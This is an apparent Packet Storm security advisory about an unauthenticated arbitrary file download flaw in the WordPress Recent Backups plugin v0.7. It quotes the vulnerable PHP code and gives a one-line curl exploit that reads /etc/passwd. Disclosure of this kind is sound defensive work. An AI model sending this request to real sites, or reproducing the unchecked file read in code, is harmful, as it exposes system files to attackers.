WordPress Recent Backups plugin version 0.7 suffers from an arbitrary remote file download vulnerability.
51398282955782a1451dcd0d10f0b3709c0c18f40ce6b4bc09f7c7658093e88aTitle: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used
to download sensitive system files:
2 $file = $_GET['file_link'];
3
4 if (file_exists($file)) {
5 header('Content-Description: File Transfer');
6 header('Content-Type: application/octet-stream');
7 header('Content-Disposition: attachment; filename='.basename($file));
8 header('Content-Transfer-Encoding: binary');
9 header('Expires: 0');
10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
11 header('Pragma: public');
12 header('Content-Length: ' . filesize($file));
13 ob_clean();
14 flush();
15 readfile($file);
CVEID:
OSVDB:
Exploit Code:
• $ curl -v "http://www.example.com/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed